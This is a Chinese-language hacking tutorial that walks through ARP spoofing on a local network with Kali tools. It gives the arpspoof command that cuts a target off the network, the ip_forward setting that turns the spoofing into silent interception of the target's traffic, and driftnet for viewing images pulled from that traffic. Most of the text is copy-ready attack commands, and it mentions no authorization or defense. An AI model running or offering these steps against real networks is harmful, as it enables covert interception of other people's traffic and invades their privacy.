茴香豆安全 - ARP断网攻击与流量劫持

一、ARP断网攻击

其实断网不是目的，只是在ARP欺骗过程中如果设置不正确会导致目标断网
我们真正要做的是，是通过ARP欺骗来对目标进行流量劫持

1. 使用的工具是 arpspoof ，如果kali中没有安装，先安装

apt-get install arpspoof

• 如果提示安装失败，执行下面的命令

apt-get install dsniff ssldump

2. 使用arpspoof，来攻击目标，前提是你和目标在同一个局域网，可以互相访问，你知道目标的IP地址，怎么扫描局域网中的IP地址这个以后再说

• 有兴趣的同学可以先看下arpspoof的使用帮助

arpspoof -h

• 或者跳过，直接执行下面的命令来攻击目标

arpspoof -i eth0 -t 192.168.1.129 192.168.1.1

命令格式：arpspoof -i 网卡 -t 目标ip 局域网的网关
网卡：当前你的kali系统的网卡，可以通过ifconfig或者 ip a 查看，比如eth0，ifconfig命令渐渐被淘汰了
目标IP：192.168.1.129 （请自行替换）
网关：192.168.1.1 （请自行替换）

• 不出意外，此时目标机已经断网了

二、ARP流量劫持

目标机之所以会断网，我个人理解，是因为目标机发给网关的流量，被我们给截获了。
如果既要保证我们可以截获目标机的流量，同时也不影响他的上网，那么就只要设置转发就可以了

1. 流量转发，执行下面的命令，

echo 1 > /proc/sys/net/ipv4/ip_forward

echo 是一个输出命令，上面的命令简单解释就是 把1 写入到 /proc/sys/net/ipv4/ 目录下 ip_forward 文件中，其实就是修改配置文件中的值，1转发，0不转发

• 此时你再执行上面的 arpspoof 就会发现目标机器不断网了，但是他的流量也被我们给劫持了

2. 查看所劫持流量中的图片

• 劫持了流量肯定是为了做流量分析而达到一定的目的，这里就不展开说了
• 这里可以介绍一个工具driftnet，可以查看流量中的图片
• 执行下面的命令就会弹出一个框，然后显示当前网卡eth0流量中的图片

driftnet -i eth0